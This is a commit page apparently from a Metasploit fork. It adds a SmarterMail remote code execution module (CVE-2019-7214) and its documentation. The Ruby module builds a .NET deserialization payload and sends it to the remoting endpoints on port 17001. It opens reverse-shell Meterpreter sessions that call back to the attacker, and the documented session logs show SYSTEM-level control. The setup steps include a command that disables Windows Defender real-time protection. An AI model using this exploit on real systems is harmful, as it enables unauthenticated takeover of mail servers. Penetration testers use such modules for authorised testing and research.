adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

SmarterMail RCE module and documentation

Browse Source
This commit is contained in:
ismaildawoodjee
2023-07-06 08:00:28 -04:00
parent 88a539a82c
commit ad0d3e79a9
2 changed files with 520 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/windows/http/smartermail_rce.md
+317
View File
@@ -0,0 +1,317 @@
## Vulnerable Application
The vulnerability affects:
* SmarterTools SmarterMail Version <= 16.3.6989.16341 (all legacy versions without a build number)
* SmarterTools SmarterMail Build < 6985
### Description
This module exploits a vulnerability in the SmarterTools SmarterMail software for version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds expose three .NET remoting endpoints on port 17001, namely `/Servers`, `/Mail` and `/Spool`. For example, a typical installation of SmarterMail Build 6970 will have the `/Servers` endpoint exposed to the public at `tcp://0.0.0.0:17001/Servers`, where serialized .NET commands can be sent through a TCP socket connection.
The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability to perform .NET deserialization attacks, allowing remote code execution for any unauthenticated user under the context of the SYSTEM account. Successful exploitation results in full administrative control of the target server under the `NT AUTHORITY\SYSTEM` account.
This vulnerability was patched in Build 6985, where the 17001 port is no longer publicly accessible, although it can be accessible locally at `127.0.0.1:17001`. Hence, this would still allow for a privilege escalation vector if the server is compromised as a low-privileged user.
### Setup
This module was tested on SmarterMail Build 6919, 6970 (with positive results), Build 6985 (with negative results), and on Version 16.3.6989 (with positive results).
Legacy builds and versions of SmarterMail can be obtained by signing up to the SmarterTools website to create a user account, and then navigating to the [Legacy Builds](https://www.smartertools.com/account#/downloads) page, where `EXE` and `MSI` files can be downloaded.
## Verification Steps
1. Sign up to the [SmarterTools website](https://www.smartertools.com/). Log in with your created account.
2. Download `EXE` legacy versions and builds from a dropdown menu at [Legacy Builds](https://www.smartertools.com/account#/downloads), specifically SmarterMail 16.x, Build 6970 and Build 6985.
3. Install the executable file (e.g. `SmarterMail_6970.exe`) and follow the instructions provided. If reinstalling a different version/build, simply choose `Use an existing site` when prompted in `Site Configuration Type`, and select `SmarterMail` in the next option.
4. Verify that the login page can be accessed at `http://localhost:9998/interface/root#/login`. Set Admin username and password to be `admin:admin` (or anything arbitrary) if prompted.
5. Disable realtime protection on an Administrative PowerShell session with `Set-MpPreference -DisableRealtimeMonitoring $true`.
6. Start `msfconsole` and follow along with default options.
7. Do: `use exploit/windows/http/smartermail_rce`
8. Do: `set RHOSTS [SMARTERMAIL_SERVER_IP]`
9. Do: `set LHOST eth0`
10. Do: `exploit`
## Options
### TARGET (Required)
0. Target 0 (Default) - x86/x64 Windows PowerShell Stager uses a PowerShell stager to execute code and open a Meterpreter session. Choose with `set TARGET 0`.
1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code and open a Meterpreter session. Choose with `set TARGET 1`.
### ENDPOINT (Required)
Choose one of three exposed .NET remoting endpoints, either `Servers`, `Spool` or `Mail`. The default is `Servers`, but any one of the three will do.
### RPORT (Required)
This is the port for the SmarterMail HTTP server, which is default on port 9998. Although this port is not required for exploitation, it is required for checking the vulnerability and version/build number of the SmarterMail software.
### TARGETURI (Required)
This is the base path of the SmarterMail HTTP server. The vulnerability check follows the redirect from base path `/` to the login page at `/interface/root#/login`, but this option is provided in case the login page is located at a different URI.
### TCP_PORT (Required)
This is the TCP port where the .NET remoting endpoints are located, and is required for sending serialized data and Meterpreter payloads. The default port is 17001.
## Scenarios
### SmarterMail Build 6970 on Windows 10 Pro
* Using default TARGET 0 - x86/x64 Windows PowerShell Stager:
```
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55046) at 2023-07-06 05:39:43 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
* Using TARGET 1 - x86/x64 Windows CmdStager:
```
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
[*] Command Stager progress - 4.02% done (4092/101881 bytes)
[*] Command Stager progress - 6.02% done (6138/101881 bytes)
[*] Command Stager progress - 8.03% done (8184/101881 bytes)
[*] Command Stager progress - 10.04% done (10230/101881 bytes)
[*] Command Stager progress - 12.05% done (12276/101881 bytes)
[*] Command Stager progress - 14.06% done (14322/101881 bytes)
[*] Command Stager progress - 16.07% done (16368/101881 bytes)
[*] Command Stager progress - 18.07% done (18414/101881 bytes)
[*] Command Stager progress - 20.08% done (20460/101881 bytes)
[*] Command Stager progress - 22.09% done (22506/101881 bytes)
[*] Command Stager progress - 24.10% done (24552/101881 bytes)
[*] Command Stager progress - 26.11% done (26598/101881 bytes)
[*] Command Stager progress - 28.12% done (28644/101881 bytes)
[*] Command Stager progress - 30.12% done (30690/101881 bytes)
[*] Command Stager progress - 32.13% done (32736/101881 bytes)
[*] Command Stager progress - 34.14% done (34782/101881 bytes)
[*] Command Stager progress - 36.15% done (36828/101881 bytes)
[*] Command Stager progress - 38.16% done (38874/101881 bytes)
[*] Command Stager progress - 40.16% done (40920/101881 bytes)
[*] Command Stager progress - 42.17% done (42966/101881 bytes)
[*] Command Stager progress - 44.18% done (45012/101881 bytes)
[*] Command Stager progress - 46.19% done (47058/101881 bytes)
[*] Command Stager progress - 48.20% done (49104/101881 bytes)
[*] Command Stager progress - 50.21% done (51150/101881 bytes)
[*] Command Stager progress - 52.21% done (53196/101881 bytes)
[*] Command Stager progress - 54.22% done (55242/101881 bytes)
[*] Command Stager progress - 56.23% done (57288/101881 bytes)
[*] Command Stager progress - 58.24% done (59334/101881 bytes)
[*] Command Stager progress - 60.25% done (61380/101881 bytes)
[*] Command Stager progress - 62.25% done (63426/101881 bytes)
[*] Command Stager progress - 64.26% done (65472/101881 bytes)
[*] Command Stager progress - 66.27% done (67518/101881 bytes)
[*] Command Stager progress - 68.28% done (69564/101881 bytes)
[*] Command Stager progress - 70.29% done (71610/101881 bytes)
[*] Command Stager progress - 72.30% done (73656/101881 bytes)
[*] Command Stager progress - 74.30% done (75702/101881 bytes)
[*] Command Stager progress - 76.31% done (77748/101881 bytes)
[*] Command Stager progress - 78.32% done (79794/101881 bytes)
[*] Command Stager progress - 80.33% done (81840/101881 bytes)
[*] Command Stager progress - 82.34% done (83886/101881 bytes)
[*] Command Stager progress - 84.35% done (85932/101881 bytes)
[*] Command Stager progress - 86.35% done (87978/101881 bytes)
[*] Command Stager progress - 88.36% done (90024/101881 bytes)
[*] Command Stager progress - 90.37% done (92070/101881 bytes)
[*] Command Stager progress - 92.38% done (94116/101881 bytes)
[*] Command Stager progress - 94.39% done (96162/101881 bytes)
[*] Command Stager progress - 96.39% done (98208/101881 bytes)
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55099) at 2023-07-06 05:43:26 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
### SmarterMail Version 16.3.6989 on Windows 10 Pro
* Using ENDPOINT `Mail`:
```
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set ENDPOINT Mail
ENDPOINT => Mail
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[!] Product build not found. 16.x versions and below do not have a build number.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 16.3.6989.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55147) at 2023-07-06 06:20:19 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```
### SmarterMail Build 6985 on Windows 10 Pro
```
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/smartermail_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/smartermail_rce) >
```
### SmarterMail Build 6919 on Windows 10 Pro (Algernon from Proving Grounds Practice)
```
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.247.65
RHOSTS => 192.168.247.65
msf6 exploit(windows/http/smartermail_rce) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/http/smartermail_rce) > check
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[*] 192.168.247.65:9998 - The target appears to be vulnerable.
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.45.188:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.247.65
[*] Meterpreter session 1 opened (192.168.45.188:4444 -> 192.168.247.65:49710) at 2023-07-06 07:24:13 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ALGERNON
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > shell
Process 4240 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.815]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
84b4****************************
C:\Users\Administrator\Desktop>
```
modules/exploits/windows/http/smartermail_rce.rb
+203
View File
@@ -0,0 +1,203 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SmarterMail Build 6985 - dotNET Deserialization Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the SmarterTools SmarterMail
software for version numbers <= 16. or for build numbers < 6985.
The vulnerable versions and builds expose three .NET remoting endpoints
on port 17001, namely `/Servers`, `/Mail` and `/Spool`. For example, a
typical installation of SmarterMail Build 6970 will have the `/Servers`
endpoint exposed to the public at `tcp://0.0.0.0:17001/Servers`, where
serialized .NET commands can be sent through a TCP socket connection.
The three endpoints perform deserialization of untrusted data
(CVE-2019-7214), allowing an attacker to send arbitrary commands
to be deserialized and executed. This module exploits this vulnerability
to perform .NET deserialization attacks, allowing remote code execution
for any unauthenticated user under the context of the SYSTEM account.
Successful exploitation results in full administrative control of the
target server under the `NT AUTHORITY\SYSTEM` account.
This vulnerability was patched in Build 6985, where the 17001 port is
no longer publicly accessible, although it can be accessible locally
at `127.0.0.1:17001`. Hence, this would still allow for a privilege
escalation vector if the server is compromised as a low-privileged user.
},
'License' => MSF_LICENSE,
'Author' => [
'Soroush Dalili', # Original discovery and PoC
'1F98D', # ExploitDB author
'Ismail E. Dawoodjee' # Metasploit module author
],
'References' => [
[ 'CVE', '2019-7214' ],
[ 'EDB', '49216' ],
[ 'URL', 'https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/' ]
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'x86/x64 Windows PowerShell Stager',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
}
}
],
[
'x86/x64 Windows CmdStager',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_cmdstager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'CmdStagerFlavor' => 'vbs'
},
'CmdStagerFlavor' => %w[vbs certutil]
}
]
],
'Privileged' => false,
'DisclosureDate' => '2019-04-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(9998, true, 'SmarterMail default HTTP port'),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptInt.new('TCP_PORT', [true, 'SmarterMail default .NET remoting port', 17001]),
OptString.new(
'ENDPOINT', [
true,
'Choose one of three exposed endpoints: Servers, Spool, and Mail. Example - tcp://127.0.0.1:17001/Servers',
'Servers'
]
)
]
)
end
def check
print_status('Checking target web server for a response...')
res = send_request_cgi!({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
if res
body = res.body
else
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 200 && body.downcase.include?('smartermail')
return CheckCode::Unknown('Target is not running SmarterMail.')
end
print_good('Target is running SmarterMail.')
print_status('Checking SmarterMail product build...')
product_build = body.match('stProductBuild.*\s\(')
build_number = product_build.to_s.scan(/\d+/)[0] if product_build
if product_build
print_good("Target is running SmarterMail Build #{build_number}.")
else
print_warning('Product build not found. 16.x versions and below do not have a build number.')
end
if product_build && Rex::Version.new(build_number) < Rex::Version.new('6985')
return CheckCode::Appears
end
print_status('Checking SmarterMail product version...')
product_version = body.match('stProductVersion.*')
version_number = product_version.to_s.split('"')[1] if product_version
unless product_version
return CheckCode::Detected('SmarterMail product version cannot be determined.')
end
print_good("Target is running SmarterMail Version #{version_number}.")
if Rex::Version.new(version_number) <= Rex::Version.new('16.3.6989.16341')
return CheckCode::Appears
end
return CheckCode::Safe
end
def execute_command(cmd, _opts = {})
uri = "tcp://#{datastore['RHOST']}:#{datastore['TCP_PORT']}/#{datastore['ENDPOINT']}"
serialized = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TypeConfuseDelegate,
formatter: :BinaryFormatter
)
preamble = '.NET'.unpack('C*') # Header
preamble += [0x01] # Version Major
preamble += [0x00] # Version Minor
preamble += [0x00, 0x00] # Operation Type
preamble += [0x00, 0x00] # Content Distribution
preamble += [serialized.length].pack('I').unpack('C*') # Serialized Data Length
preamble += [0x04, 0x00] # URI Header
preamble += [0x01] # Data Type
preamble += [0x01] # Encoding - UTF8
preamble += [uri.length].pack('I').unpack('C*') # URI Length
preamble += uri.unpack('C*') # URI
preamble += [0x00, 0x00] # Terminating Header
data = preamble + serialized.unpack('C*') # Data to Send
final_payload = data.pack('C*')
begin
sock = TCPSocket.open(datastore['RHOST'], datastore['TCP_PORT'])
rescue ::Errno::EADDRINUSE, ::Errno::EHOSTUNREACH, ::Errno::ETIMEDOUT, ::Errno::ECONNREFUSED, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
else
sock.write(final_payload)
sock.close
end
end
def exploit
case target['Type']
when :psh_stager
execute_command(
cmd_psh_payload(
payload.encoded, payload.arch.first, remove_comspec: true
)
)
when :windows_cmdstager
execute_cmdstager
end
end
end